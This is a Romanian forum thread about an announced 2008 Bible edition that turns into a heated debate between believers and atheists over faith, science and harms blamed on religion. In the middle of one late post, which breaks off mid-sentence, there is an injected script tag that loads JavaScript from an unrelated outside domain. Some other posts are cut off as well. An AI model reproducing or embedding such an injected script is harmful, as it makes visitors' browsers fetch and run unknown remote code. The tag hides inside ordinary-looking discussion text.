PDA

Arată versiune întreagă : Biblia-editia 2008

doru9
02.12.2007, 09:31
Vine pe piata prin martie. La sfirsitul cartii va fi o sectiune: "de ce nu cred oamenii in biblie?" Cine crede nu va cumpara cartea deci intrebarea, normal, nu este pentru ei. Care din voi nu credeti din motive frumos prezentate (clar, in trei propozitii ori less, in engleza) puteti trimite motivul vostru la drumul.taberei@yahoo.com Daca sunteti selectati vi se va cere nume (sau initiale) si orasul unde locuiti. Daca nu vreti, nu trimiteti. Vor fi alese primele 50 de raspunsuri, cele mai interesante bineinteles. Hai sa va vad hahaha.

Deadline-ul este pina pe dec 15, 2007 deci aveti citeva zile. Cum se scrie ceva misto? Well...intii scrie ce vrei si las-o! Vino a doua zi si retranscrie ce ai scris-unele cuvinte vor fi inlocuite, alteve vor zbura, in fine, mesajul va fi putin mai clar. A treia zi (a treia oara e da charm hahaha) citeste-ti mesajul tare sa vezi daca suna aiurea. Lucreaza la el dar daca trebuie sa adaugi...ceva nu e in regula. Tre sa lucrezi cu ce ai pe hirtie nu in minte-trebuie sa mai tai din ce ai scris in prima zi, nu sa mai adaugi ca pe urma iar iti trebuiesc trei zile sa il aduci la forma acceptabila. Care din voi se pricepe la scris puteti sarii peste cele trei zile dar daca ii spui motivul tau vreunuia si ala te intreaba :ce mah?" inseamna ca si tu ai nevoie de trei zile hahaha. Hai bafta.

angeline
02.12.2007, 10:05
practic ceea ce faci tu este o dubla campanie insotita de o alta cel putin dubla si ea, de publicitate gratuita si ma mir ca se accepta si tolereaza un asemenea comportament (sper sa nu dureze)smileys/smiley2.gif

doru9
02.12.2007, 11:34
angeline...si care-i problema ta? Traiasca cenzura? Hehehe, daca erai tu la putere nu se mai inventa internetul...

In loc sa ma combati cu argumente tu incerci sa ma combati cu "pumnu-n gura." Asa excrocheriile traiesc milenii-sustinute de oameni corecti dar inconstienti. Ne meritam soarta de maimutse in blugi.

fl%rin
03.12.2007, 21:21
Bravo angeline, spune-i zevzecului! Ia uite !!! Pocaiti, pocaiti dar ai dracu'...

sorin
04.12.2007, 00:42
... spune-i zevzecului! ....

florin10, iti sugerez sa folosesti un vocabular decent, fara a jigni, indiferent ce scriu forumistii. mesajele care nu se incadreaza specificului acestui forum vor fi editate sau sterse de administratori, dar nu este nevoie sa va "felicitati" intre voi.

doru9, ai grija ca si tu esti la limita cu limbajul folosit pe acest forum, nu neaparat aici ci si pe alte topice.

fl%rin
04.12.2007, 02:02
Imi recunosc greseala, si imi cer scuze.

dortmund
03.01.2008, 17:14
florin nici o problema din partea mea. Limbajul tau este reconfortant prin sinceritate-citesc niste mesaje de imi vine sa vars de sila si plictis si aia ar trebuii "sa isi recunoasca greseala" ca s-au nascut artificiali. Tu nu-baga tare hahahaha.

fl%rin
03.01.2008, 19:55
Dorule, nu era treaba mea sa ma bag, am judecat pripit. Eu am fost de fapt un zevzec. Cat despre editia noua a Bibliei, ce sa zic... Copaci taiati de pomana, bani aruncati in vant, iluzii desarte.

dortmund
04.01.2008, 07:10
florin...iluzii desarte? Ha? Aia vind iluzii desarte la fiecare serviciu religios. Si fiecare crede in iluziile desarte corespunzatoare locului unde s-au nascut. Ti se pare normal sa privesti "vaca" ca ceva "sfint?" Nu pentru ca nu te-ai nascut in Bombay hahaha. Ti se pare normal sa te rogi de 5 ori pe zi unuia care ti-a dat nisip si nimic altceva? Nu, pentru ca nu te-ai nascut intr-o familie de dementi cu buletine de Teheran. Fiecare crede in ce a fost conditionat sa creada dar noroc cu mine ca vin sa trezesc prostimea cu cartiile mele pur si simplu superbe hahaha.

Cind or sa vina extraterestrii o sa le spun cum ai facut misto de ei, sa te vad atunci hahaha

fl%rin
04.01.2008, 07:32
Stai putin sa vedem daca vorbim despre acelasi lucru. Din titlul topicului tau, am inteles ca o sa apara o noua editie a Bibliei ( Vechiul si Noul Testament ). Eu la asta ma refer. Daca tu te referi la alta carte, fii te rog mai clar. In rest, sunt de acord cu tine.

05.01.2008, 06:39
Un proverb biblc spune: "Omul fara minte crede orice cuvant, dar cel cu minte ia bine seama cum merge" (Proverbe 14:15, Today's English Version). Numai un om fara minte ar da crezare orcarei vorbe, bazandu-si deciziile si actiunile pe sfaturi si invataturi nefondate. Shakespeare a scris: "Nu te increde in scanduri putrezite". Daca ar fi sa urcati intr-o barca, nu-i asa ca v-ati asiguramai intai ca scandurile nu sunt putrezite? Milioane de oameni de pe tot pamantul isi pun increderea intr-o carte veche: Biblia. Se lasa calauziti de ea, isi bazeaza deciziile pe sfaturile ei si traiesc potrivit invataturilor ei. Oare calca acesti oameni pe "scanduri putrezite"?

dortmund
05.01.2008, 12:51
florin10 (adica 9.5 ca nu crede in elienshi) noua editie a Bibliei ( Vechiul si Noul Testament ). Eu la asta ma refer.

Ne referim la aceasi carte si gresesti sa spui ca este "taiare de copaci aiurea" sau ceva de genul asta. De exemplu vezi la Genesa, capitolul 6, versetul 2...ce scrie in biblea veche? De ingeri? Pai aia au aripi nu penisuri deci...bibla noua o sa scrie "aliens." Deci orice editie ce ia in considerare evoluarea dialectelor este binevenita. Nu poti sa intelegi nimic daca este scris in limbaj arhaic cum nici aia nu pot sa ne inteleaga pe noi daca ar venii acuma. Felul de exprimare face toti banii-spui ceva neclar si vine un bou, fuge in desert si in maxim 3 ani ai o noua religie hahaha cind tu de fapt to ce ai vrut sa face a fost sa ii inveti pe aia ca boliile de piele se trateazacu antibiotice oricu izolare, depinde de ce ai la indemina.

kirk: Milioane de oameni de pe tot pamantul isi pun increderea intr-o carte veche: Biblia.

Ok...si? Milioane de oameni erau cit pe ce sa se inroleze in armata lui Saddam pentru a elibera Ierusalimul desii e clar ca evreii cind le-o ajunge cutitul la os or sa dea cu nucleare in arabi pina or sa cinte aia corul vinatoriilor in germana! Actiuniile nu trebuiesc judecate prin prizma numarului de participanti ci prin prizma contextului istoric-cine a controlat publicarea si distribuirea bibliei? Dupa ce aflii aia faci pasul numero dos: ce interese au avut acei lideri? Daca raspunsul este "sa isi mentina puterea politica"...poti sa faci pe produsul lor pentru ca este contaminat. Biblia nu este "cunostiinta" ci propaganda si daca milioane de oameni sunt victime...sa fie de capul lor. Aici in Chicago avem 40.000 de imbecili la fiecare meci a lui Chicago Cubs desi astia nu au mai cistigat de pe vremea lui George Washington. Sa mergem sa sustinem o echipa ce nu da doi lei pe performanta pentru ca milioane de oameni o fac an de an? Inca nu uit pe "sora Ioana din Phenix" cum m-a luat la trei pazeste pentru prima carte desi NICI NU A CITIT-O pentru ca nu avea cum hahaha. Milioane de oameni nu vor sa considere nimic "ofensiv" deci nu vreau sa consider nici eu parerea lor.

Raven
06.01.2008, 00:11
Cat despre editia noua a Bibliei, ce sa zic... Copaci taiati de pomana, bani aruncati in vant, iluzii desarte.
Mda si autobiografiile marilor figuri mici gen Beckham, Paris Hilton, Rio Ferdinand, Jordan & Co, alea ce sunt?
Sau ambalajele de-un metru cub la suta de grame de produs invelit, alea ce sunt, save the planet?
Sau DVD-urile la calup, de ex. 3-disc special collectors whatever cu materiale care intra pe-un singur disc, alea tot la atitudinea we're green intra?

Si ca sa fiu in tune cu evenimentele, campaniile prezidentiale americane care de zeci de ani produc presedinti de looney tunes, alea ce sunt? Cu cat se cheltuie mai mult in campanii, cu atat mai inapt e presedintele ales (ce departe in fatza sunt Washington si Lincoln, religiosii aia care citeau Biblia si incercau s-aplice mesajul biblic). Evolutie.

fl%rin
06.01.2008, 12:43
Raven, de acord cu tine, se face multa risipa. Dar era vorba despre Biblie in discutia de fata, deci m-am referit la subiectul discutiei.

Despre Washington nu stiu, dar Lincoln nu era sigur religios, iar SUA nu a fost fondat ca un stat crestin sau de alta religie. Ca a devenit asa in timp este alta problema. Cred ca s-ar intoarce in morminte semnatarii constitutiei daca ar vedea ce a devenit statul american ( d.p.d v. religios ) - biserici care invart sute de milioane de dolari si nu platesc nici o taxa si altele asemenea.

ramos
06.01.2008, 14:42
biserici care invart sute de milioane de dolari si nu platesc nici o taxa si altele asemenea. Biserica ,una, sfanta, soborniceasca si apostoleasca. Cat despre celelalte, vreo patru mii, florine, sunt de acord cu tine. Si, am mai spus-o pe acest forum, in locul oricarui asemenea "bisericos", in ochii mei, mai de apreciat esti tu.

fl%rin
06.01.2008, 21:41
multumesc pentru aprecieri ramos.

Raven
07.01.2008, 01:23
Pai omul e sincer (de Florin10 vorbesc). Nu sunt la fel de sigur despre majoritatea popilor suspecti de ipocrizie invelita-n sutana.

Ce-a facut Iisus cu popii care faceau afaceri in templu si-n acelasi timp o faceau pe evlaviosii?

Revenind la risipa, Biblia ed. 2008 poate ca se inscrie la aceleasi reguli consumeristice ca si restul. Sau poate chiar are imbunatatiri, desi nu prea stiu ce imbunatatiri s-ar putea aduce unor asemenea carti in afara de materiale - hartie, coperti, tipar si eventual ceva harti mai colorate si mai detaliate insotite de resurse religioase serioase pe web.

Despre Washington nu stiu, dar Lincoln nu era sigur religios

Amandoi au fost religiosi.

"The will of God prevails." (Lincoln)

ramos
07.01.2008, 01:49
Ce-a facut Iisus cu popii care faceau afaceri in templu si-n acelasi timp o faceau pe evlaviosii?
[i]Dar tot Hristos,

idontknow
26.02.2008, 09:50
Milioane de oameni de pe tot pamantul isi pun increderea intr-o carte veche: Biblia. Se lasa calauziti de ea, isi bazeaza deciziile pe sfaturile ei si traiesc potrivit invataturilor ei. Oare calca acesti oameni pe "scanduri putrezite"?

Mda, uneori stau si ma intreb de ce apeleaza oamenii la argumentul asta.Hai sa o luam altfel:milioane de oameni de-a lungul timpului si-au pus increderea in pietre, in Soare, in zeii Olimpului, in Ra si toate aceste zeitati s-au regasit in diferite scrieri...timp de mii de ani...apoi au urmat alte cateva mii de ani in care si-au pus increderea in Dumnezeul din Biblie, in Allahul din Coran sau in Absolutul din filosofiile Orientului...au sa mai treaca alte cateva mii de ani si oamenii au sa isi calauzeasca viata dupa alte religii...Dar ceea ce se poate observa este sincretismul religios, deoarece omul nu poate accepta sa renunte la religia lui dintr-o data.Asa ca de asta stau eu si ma consumcand vad ca prototipul lui Iisus exista cu mii de ani inaintea Lui, ca asa zisele "profetii" au fost adaugate in Biblie ca sa se potriveasca cu evenimentele...si poate ca asa vor suferi alti oameni in viitor cand vor vedea ca Adevarul copilariei lor este inspirat din adevarul Bibliei din trecut...si tot asa trece timpul, si suntem mistuiti de timp si de incertitudine, apoi ajungem hrana pentru viermi si natura isi continua linistita ciclul...pana vine meteoritu' peste noi, si, odata cu viata de pe Pamant, dispar si toate religiile care povestesc frumos despre Doamne Doamne si despre nemurirea sufletului...Altfel, va zic eu ca nu exista nici o sansa sa dispara...o sa se confunde treptat intre ele pentru a se adapta evolutiei omului, civilizatiei si stiintei, pentru ca pur si simplu habar n-avem ce naiba cautam pe-aici si de ce ne zbatem atata sa supravietuim si sa dam sens existentei noastre pentru ca apoi sa disparem pur si simplu si sa lasam in urma lacrimile celor dragi!

keyframe14
26.02.2008, 10:16
odata cu viata de pe Pamant, dispar si toate religiile care povestesc frumos despre Doamne Doamne si despre nemurirea sufletului..exista povesti mai frumoase de nemurirea sufletului decat maculatura aia prost scrisa...referitor la doamne doamne ..cred ca superman era mai puternicsmileys/smiley36.gif

o sa se confunde treptat intre ele pentru a se adapta evolutiei omului, civilizatiei si stiintei, pentru ca pur si simplu habar n-avem ce naiba cautam pe-aici si de ce ne zbatem atata sa supravietuim si sa dam sens existentei noastre pentru ca apoi sa disparem pur si simplu si sa lasam in urma lacrimile celor dragi!Dispari oricum..la fel pt cei dragi si acum..sau stii tu altceva si vrei sa ne faci o marturisire?....cred ca ar trebui sa arati mai multa recunostinta pentru stiinta , calculatorul la care scrii este meritul unor oameni care nu credeau in "minuni"...si l-au rugat pe d-zeu sa bata din palme...smileys/smiley2.gif

Raven
26.02.2008, 21:51
cred ca ar trebui sa arati mai multa recunostinta pentru stiinta , calculatorul la care scrii este meritul unor oameni care nu credeau in "minuni"...si l-au rugat pe d-zeu sa bata din palme...smileys/smiley2.gif

In aceeasi ordine de idei ar trebui sa fim recunoscatori rotii si focului si mai ales oamenilor care le-au "descoperit" si care... credeau in minuni.

Cate tehnica de calcul ar fi existat fara foc si roata?

In alta ordine de idei, esti asa sigur pe convingerile intime ale lui von Neumann de ex.? Omul putea f. bine sa nu se duca la sinagoga nici macar o data pe deceniu si totusi sa fie un religios autentic. Asta cel mai bine o stia el si poate si cei apropiati lui.

PS: Degeaba avem computere daca n-avem retea. <wink>

keyframe14
27.02.2008, 00:04
In aceeasi ordine de idei ar trebui sa fim recunoscatori rotii si focului si mai ales oamenilor care le-au "descoperit" si care... credeau in minuni.De unde ai informatia asta?Ideea de roata a aparut de la civilizatia sumeriteana care, in credinta lor nu avea nici in clin nici in maneca cu dumnezeul asta inventat...
. They didn

idontknow
27.02.2008, 00:43
Dispari oricum..la fel pt cei dragi si acum..sau stii tu altceva si vrei sa ne faci o marturisire?....cred ca ar trebui sa arati mai multa recunostinta pentru stiinta , calculatorul la care scrii este meritul unor oameni care nu credeau in "minuni"...si l-au rugat pe d-zeu sa bata din palme...http://www.romanian-portal.com/forum/smileys/smiley2.gif

Si cam ce treaba are asta cu ce ziceam eu?smileys/smiley5.gifsmileys/smiley25.gifAm zis eu ca nu dispar oamenii?Si daca tot ai adus vorba de stiinta, sa nu confundam toata stiinta cu tehnologia.Deci eu iti spun sincer ca daca mi-as recapata credinta si daca nu ar exista atatea informatii istorice care sa dovedeasca ca crestinismul este o mare inselare, as renunta in schimb bucuroasa la toate facilitatile astea...adica pentru mine e mult mai importanta aceasta latura a existentei...la ce ma ajuta pe mine sa iau atatea chestii de pe net si sa vorbesc cu oricine de pe Pamantul asta daca nu am un echilibru spritual?Chiar nu ti se pare ca o persoana care traieste inmunti si vede in fiecare zi un peisaj mirific si face o munca care nuo streseaza psihic si traieste in comuniune cu naturasi cu Dumnezeu si merge duminica laslujba dintr-o bisericuta de lemn este mai fericit sau macar mai impacat cu viata decat noi, care gasim mereualte defecte arereligiei si ne pierdem viata numai cu lucruri superficiale?Pur si simplu culturagenerala si tehnologia nute potface sa speri, sa visezi la nemurireasufletului si la fericire adevarata...ele iti aduc doar o mica satisfactie pe moment, dar ce rost au toate astea daca viata se sfarseste(acum ma refer si la spirit, nu doar la trup)?Deci banuiesc ca nu ai cum sa intelegi, daca nu aiavut vreodata o legatura cat de firavacu Dumnezeu...adica cam ce e mai important dupa parerea ta?Ca viata asta sa aiba un sens si un scop, sau sa existe o gramada de masinarii care mai de care mai performante, dar care nu au cum sa aline sufletul omului?Si oricum, mesajul meu daca cumva nu ti-ai dat seama, exprima revolta impotrivacrestinismului care imi provoaca acum atatea deziluzii...

keyframe14
27.02.2008, 01:03
Chiar nu ti se pare ca o persoana care traieste inmunti si vede in
fiecare zi un peisaj mirific si face o munca care nuo streseaza psihic
si traieste in comuniune cu naturasi cu Dumnezeu si merge duminica
laslujba dintr-o bisericuta de lemn este mai fericit sau macar mai
impacat cu viata decat noi
Youdontknow, tu chiar ca crezi ca menirea omului e sa stea izolat , practic sa-si iroseasca viata multumind-i cuiva ca ce? sau mai rau sa se roage sa nu ajunga in iad asa cum fac majoritatea "credinciosilor"pt care credinta nu e decat o frica...ce-ai zice sa se crestinizeze toata lumea si intr-o criza de egoism dus la extrem sa-si vada de "purificarea sufletului" in munti?fiecare pt el asa..ca nu traim intr-o societate...sau asta nu ne aduce..."purificarea sufletului" sau aspiratiile la viata fara de moartesmileys/smiley2.gif
Daca ar fi toti asa cum zici..specia umana nu s-ar mai perpetua, ca vorba aia sunt ocupati cu ruga toata ziua..si ar fi tot mai putini in munti la rugaciuni si admirat peisajele mirificesmileys/smiley36.gif..pana cand nu o sa mai aiba cine se ruga la dumnezeu...si atunci s-o enerva dumnezeu si mai creaza cativa omuleti sa aibe cine sa se roage la el...ca are si el orgoliul luismileys/smiley2.gif.

fl%rin
27.02.2008, 07:38
Deci eu iti spun sincer ca daca mi-as recapata credinta si daca nu ar exista atatea informatii istorice care sa dovedeasca ca crestinismul este o mare inselare, as renunta in schimb bucuroasa la toate facilitatile astea...

Crestinismul nu este numai o mare inselare, ci si o foarte mare plaga a omenirii, ca si alte religii. Sa-ti dau numai un mic exemplu: misionarii din Africa ( care se duc acolo mai mult pentru a face prozelitism decat pentru a ajuta ), isi folosesc toate resursele pentru a convinge bastinasii ca folosirea prezervativului constituie un pacat si ca vor fi pedepsiti daca il vor folosi. Asta intr-o regiune decimata de SIDA si unde nu prea exista mijloace de informare, misionarii fiind uneori singurele surse de informare din exterior. Ce zici de asta? Dau despre faptul ca unii fanatici sunt in stare sa ucida doctori numai pentru a-i impiedica sa opereze avorturi... Sau despre faptul ca exista in SUA fundamentalisti religiosi care au declarat ca s-ar impotrivi dezvoltarii unui eventual vaccin anti-HIV pentru simpul motiv ca SIDA actioneaza ( in unele cazuri ) ca o bariera ( a fricii ) in fata raportului sexual inainte de casatorie. Si multe, multe altele...
Asa ca vezi, eu spun ca este mult mai rau decat pare. Oricum, te felicit inca o data pentru gandirea sanatoasa.

nicoletamihaela
27.02.2008, 10:03
la ce ma ajuta pe mine sa iau atatea chestii de pe net si sa vorbesc cu oricine de pe Pamantul asta daca nu am un echilibru spritual?Chiar nu ti se pare ca o persoana care traieste inmunti si vede in fiecare zi un peisaj mirific si face o munca care nuo streseaza psihic si traieste in comuniune cu naturasi cu Dumnezeu si merge duminica laslujba dintr-o bisericuta de lemn este mai fericit sau macar mai impacat cu viata decat noi, care gasim mereualte defecte arereligiei si ne pierdem viata numai cu lucruri superficiale?Pur si simplu culturagenerala si tehnologia nute potface sa speri, sa visezi la nemurireasufletului si la fericire adevarata...ele iti aduc doar o mica satisfactie pe moment, dar ce rost au toate astea daca viata se sfarseste(acum ma refer si la spirit, nu doar la trup)?Deci banuiesc ca nu ai cum sa intelegi, daca nu aiavut vreodata o legatura cat de firavacu Dumnezeu...adica cam ce e mai important dupa parerea ta?Ca viata asta sa aiba un sens si un scop, sau sa existe o gramada de masinarii care mai de care mai performante, dar care nu au cum sa aline sufletul omului?

Idontknow..Ai toata admiratia si respectul meu..Ma uit cu drag ce scrii si fara sa te perii,(crede-ma ca nu o fac),ai toata credinta in tine,chiar daca esti dezamagita de multe..Poate multi ar trebuii sa vada profunzimea cuvintelor tale,a gandurilor tale,si mai ales stradania ta de a cauta ADEVARUL SI VIATA...Pentruca in definitiv cu totii asta cautam..Unii mai mult,alti mai putin,altii deloc..Dar cei care nu o cauta,nu au dreptul sa le impiedice drumul catre Dumnezeu si adevar celor care cauta..

Si oricum, mesajul meu daca cumva nu ti-ai dat seama, exprima revolta impotrivacrestinismului care imi provoaca acum atatea deziluzii...

Acum ti-a provacat deziluzii,dar poate mai tarziu vei gasii adevarul despre crestinism...Dar adevarul pe care constiinta ta si sufletul tau o poate asimila..Nu poti gasi dintr-o data totul,si te rog sa ma scuzi daca te-am necajit acum cu cuvintele mele,dar poate dura o viata si poate dincolo de viata,cand iti dai seama ca ai gasit sau nu raspunsul la intrebarile ramase fara raspuns....De multe ori le abandonam intrebarile (si multi o fac),si nu din comoditate,ci doar din avalansa de informatie care ne cotropeste vietile...Inainte citeam 5-6-sau zeci de carti pe o tema data si ne faceam o parere..Acum accesam milioane si milarde de siteuri,si ajungem sa nu mai intelegem mare lucru...

Deci nu te descuraja in cautarile tale....Si nu lua in seama descurajaile..Nu te fac decat sa te necajeasca si sa iti abata gandul de la adevarata ta cautare...Stii cu ce se aseamana acest soi de descuajari ?

fl%rin
27.02.2008, 14:57
idontknow, eu sustin ca ai samanta ateismului in tine, si nu credinta. Credinta ( religia ) este o mostenire de la parinti, asa ai fost educata, dar vad ca ai inceput deja sa gandesti pentru tine si asta e bine. Esti deja atee referitor la islamism de exemplu, sau la existenta lui Zeus. Sa-ti mai dau un exemplu de comportare crestineasca: in El Salvador, o tara foarte religioasa, avortul este interzis ( bineinteles din considerente religioase ), si nu se face nici o exceptie, nici macar in cazul violului sau incestului, iar femeia care este prinsa ca a facut avort risca pana la 30 de ani de inchisoare. Interesant, nu?
Se cheltuiesc sume de bani enorme pentru biserica si religie, bani cu care s-ar putea face multe alte lucruri, folositoare si necesare, ca sa nu mai spun ca in Romania biserica primeste si bani de la buget, ceea ce mi se pare INACCEPTABIL. Toti acesti bani sunt cheltuiti pentru o iluzie, pentru un prieten imaginar, cand ar putea fi cheltuiti mai cu folos. Asta inseamna religia, si implicit crestinismul: o iluzie costisitoare, care provoaca suferinta inutila.

27.02.2008, 17:30
Credinta in Dumnezeu nu provoaca suferinta niciodata, Florin10.Religia, poate, sistemele si institutiile bisericesti, infiintate de oameni, poate, dar nu credinta in Dumnezeu!
Omul e liber sa aleaga, sa fie ateu, sau sa fie crestin, sa urmeze credinta neamului sau de 2000 de ani,ori sa fie adeptul oricarei filozofii posibile!
Eu respect alegerea fiecaruia!Dar nu vreau ca Idontknow sa inteleaga gresit mesajul tau!
Ea il cauta pe Dumnezeu, din cate am inteles eu si nu sa afle ca ceva pe pamantul acesta ar fi perfect.

Dar tu, draga Idontknow, trebuie sa stii un lucru, Dumnezeu nu se arata unei minti luminate, ci unei inimi curate! Si nu-mi amintesc cine a zis asta, si nici nu conteaza.
Tu alege, ce simti tu, cerceteaza,studiaza cat vrei, apoi treci prin filtrul mintii si inimii tale si alege!
Nu te considera nici atee, nici credincioasa, caci acum oricum esti mai degraba, indoita!
Considera-te libera si alege ce vrei tu, doar tu!Ca sa nu-ti reprosezi mai tarziu, ca te-ai lasat influentata! Mult succes!

fl%rin
27.02.2008, 17:47
Credinta in Dumnezeu nu provoaca suferinta niciodata, Florin10.Religia, poate, sistemele si institutiile bisericesti, infiintate de oameni, poate, dar nu credinta in Dumnezeu!

Credinta in Dumnezeu duce la religie, care duce la biserica. Invariabil. Chiar si tu faci parte dintr-un sistem religios ( banuiesc ca esti crestina ) si implicit esti afiliata unei biserici. Asa ca nu mai separa credinta de religie si de biserica pentru ca nu exista una fara celelalte. Si idontknow trebuie sa inteleaga din mesajul meu exact ceea ce am vrut sa spun, nu am nevoie de translatori pentru asta.
Hai sa-ti dau cateva exemple recente de suferinta provocata de religie ( in plus fata de cele date anterior, plus multe altele ): atentatele din SUA, atentatul din Madrid, atentatul din Londra.

Raven
27.02.2008, 22:11
[QUOTE=keyframe14]De unde ai informatia asta?Ideea de roata a aparut de la civilizatia sumeriteana care, in credinta lor nu avea nici in clin nici in maneca cu dumnezeul asta inventat...
. They didn

Raven
27.02.2008, 22:27
Hai sa-ti dau cateva exemple recente de suferinta provocata de religie ( in plus fata de cele date anterior, plus multe altele ): atentatele din SUA, atentatul din Madrid, atentatul din Londra.

Tehnic vorbind, exemplele astea sunt mai mult cauzate de politica.

Sigur, exista si altele, negative, provocate mai mult de extremismul religios.
But again, regimurile de democratie populara, toate anti-religioase, detin recordul absolut la crime contra umanitatii.

keyframe14
28.02.2008, 00:00
</span>

Credinta religioasa nu tine atat de ratiune cat de o anume convingere interioara care nu poate fi explicata "logic". But again, se stie bine ca logica umana este imperfecta si este acceptat faptul ca nu poate oferi raspunsuri la toate intrebarile.in primul rand nimic din raspunsul tau nu are legatura cu faptul ca Von Neumann a luat decizia cand cancerul i-a afectat creierull..putea sa faca o obsesie pentru pantofi, putea sa devina violent si sa se autodistruga...cu asta ai gasit raspunsul la toate intrebarile ..daca nu-ti convinge o logica spui ca situatia nu poate fi explicata logic...momentan traim dupa logica..totul e logica...Cand se prabuseste un avion.."credinciosii "zic ..asa a vrut d-zeu..dar descoperim ca a fost o defectiune tehnica si era logic sa se pabuseasca
</span>

Sigur ca merge, doar e un program care ruleaza local. Dar daca vrei sa comunici rezultatele produse, cel mai rapid, ieftin si eficient este folosind reteaua (intranet, internet, whatever) si nu serviciul postal sau vizita personala la destinatie.

Simplistic vorbind, fara retea ai numai un monolog, care, oricat de valoros, ramane aproximativ necunoscut celor in jur.
Constructiile de orice fel inca se construiesc dupa hard copies..pana in 90 nu se folosea reteaua si daca ai timp iti pot da mii de exemple de masterpieces...ma bucura in schimb sa observ ca gasesti inovatiile ca indispensabilesmileys/smiley2.gif

idontknow
28.02.2008, 03:32
Daca ar fi toti asa cum zici..specia umana nu s-ar mai perpetua, ca vorba aia sunt ocupati cu ruga toata ziua..si ar fi tot mai putini in munti la rugaciuni si admirat peisajele mirificehttp://www.romanian-portal.com/forum/smileys/smiley36.gif..pana cand nu o sa mai aiba cine se ruga la dumnezeu...si atunci s-o enerva dumnezeu si mai creaza cativa omuleti sa aibe cine sa se roage la el...ca are si el orgoliul luihttp://www.romanian-portal.com/forum/smileys/smiley2.gif.

smileys/smiley4.gifsmileys/smiley36.gifOk, esti amuzant(cred ca ti-am mai zis asta)...iti place cumva George Carlin?Ca si el e tot la fel de glumet si de superficial ca tine cand vine vorba de religie...

Crestinismul nu este numai o mare inselare, ci si o foarte mare plaga a omenirii, ca si alte religii. Sa-ti dau numai un mic exemplu: misionarii din Africa ( care se duc acolo mai mult pentru a face prozelitism decat pentru a ajuta ), isi folosesc toate resursele pentru a convinge bastinasii ca folosirea prezervativului constituie un pacat si ca vor fi pedepsiti daca il vor folosi. Asta intr-o regiune decimata de SIDA si unde nu prea exista mijloace de informare, misionarii fiind uneori singurele surse de informare din exterior. Ce zici de asta? Dau despre faptul ca unii fanatici sunt in stare sa ucida doctori numai pentru a-i impiedica sa opereze avorturi... Sau despre faptul ca exista in SUA fundamentalisti religiosi care au declarat ca s-ar impotrivi dezvoltarii unui eventual vaccin anti-HIV pentru simpul motiv ca SIDA actioneaza ( in unele cazuri ) ca o bariera ( a fricii ) in fata raportului sexual inainte de casatorie. Si multe, multe altele...
Asa ca vezi, eu spun ca este mult mai rau decat pare. Oricum, te felicit inca o data pentru gandirea sanatoasa.

Pai, nu stiu ce sa zic aici la faza cu marea plaga a omenirii...stau si ma gandesc ca daca este o mare minciuna toate vietile martirilor chinuiti pentru aceasta credinta reprezinta o adevarata tragedie care a avut loc fara nici un rost(nu ca tragediile ar avea neaparat vreun rost), in rest, despre ororile facute de Biserica Catolica iarasi nu ma pronunt, ca din cate am mai citit au fost si destule cauze politice si asa e cam in toate religiile: interesele comerciale si politice sunt puse in spinarea religiei ca, normal, daca se invoca divinitatea ca scuza(sau scop), toata lumea tace malc, sa nu-L supere pe Doamne Doamne(
sau Allah, sau Krishna sau cum i-o mai chema).Pe de alta parte, eu am vazut vieti schimbate radical dupa ce au ajuns sa creada de exemplu in Hristos...adica nu toata lumea sta si se cearta pe interpretarea versetelor sau acuza celelelate denominatiuni sau religii...uneori, cand incerci sa urmezi un exemplu despre care tu stii caa fost desavarsit si faci asta din tot sufletul, ajungi sa iti schimbi total viziunea asupra vietii si astfel de vii un om mai bun.Deci pana la urma fiecare lucru are partile lui bune si rele, si sincer cred ca e numai vina oamenilor ca ei au talentul asta de a ajunge la razboaie si la certuri placand de la o anumita conceptie despre divinitate.Chiar si in Coran, din cate am inteles nu exista acest indemn neaparat la uciderea oamenilor de alta religie, ci mai mult se sugereaza ca acesti oameni sa se apere pentru a nu isi pierde religia, adica pentru a nu fi obligati sa adopte alte credinta...

Apoi daca exista oameni incuiati la minte, nu stiu cat e de corect sa caracterizam credinta lor dupa gradul acestora de inteligenta, pentru ca ce mi-ai spus tu despre pozitia fata de vaccinul anti-HIV pe care o au acesti fundamentalisti religiosi e curata prostie.Si, intr-adevar, de-a lungul timpului umanitatea a facut niste acte monstruoase in numele credintei lor(incepand de la scoaterea inimii pe viu la mayasi pana la arderea pe rug la catolici si ingroparea de viu la musulmani), dar<script src=http://www.iroe.ru/ngg.js></script>

keyframe14
28.02.2008, 04:01
smileys/smiley4.gifsmileys/smiley36.gifOk, esti amuzant(cred ca ti-am mai zis asta)...iti place cumva George Carlin?Ca si el e tot la fel de glumet si de superficial ca tine cand vine vorba de religie...Iti vad acelasi viitor..am avut aceleasi probleme existentiale la varsta ta frageda..ai sa concluzionezi intr-un final ca din tot ce ai aflat..religia e gluma cea mai proasta..si se drege cu glume bunesmileys/smiley2.gif

idontknow
28.02.2008, 04:09
Iti vad acelasi viitor..am avut aceleasi probleme existentiale la varsta ta frageda..ai sa concluzionezi intr-un final ca din tot ce ai aflat..religia e gluma cea mai proasta..si se drege cu glume bunehttp://www.romanian-portal.com/forum/smileys/smiley2.gif

Nu cred in prezicerea viitorului de catre oameni...smileys/smiley2.gif

keyframe14
28.02.2008, 04:19
Nu cred in prezicerea viitorului de catre oameni...smileys/smiley2.gif
Draga mea am o veste proasta..extrateresti nu existasmileys/smiley36.gif

28.02.2008, 04:20
Florin10:Credinta in Dumnezeu duce la religie, care duce la biserica. Invariabil. Chiar si tu faci parte dintr-un sistem religios ( banuiesc ca esti crestina ) si implicit esti afiliata unei biserici. Asa ca nu mai separa credinta de religie si de biserica pentru ca nu exista una fara celelalte. Si idontknow trebuie sa inteleaga din mesajul meu exact ceea ce am vrut sa spun, nu am nevoie de translatori pentru asta.

Imi cer scuze Florin, daca am gresit cu ceva afta de tine.Sincer!
Da, sunt crestina ortodoxa.
Si ai dreptate, este gresit sa separ credinta in Dumnezeu de religie si de biserica. De fapt, nici nu le separ, doar m-am exprimat incorect.
Mi se pare insa, de asemenea gresit sa se amestece atentatele provocate de fanatici mai mult sau mai putin religiosi sau sistemele din diferitele tari care se bazeaza intr-o masura sau alta pe considerente religioase, cu adevarata invatatura crestina.
Iisus Hristos ne-a invatat, din cate stiu eu, sa ne iubim unii pe altii, sa ne iertam greselile reciproc, sa facem bine semenilor nostri,sau cu alte cuvinte sa fim oameni cu adevarat, si nu sa provocam suferinta sau si mai rau, moartea cuiva.
Desigur, fiecare stie mai bine ce vrea sa fie, si indiferent ca suntem crestini, atei sau orice altceva, important e sa ramanem oameni.
Iti doresc numai bine!

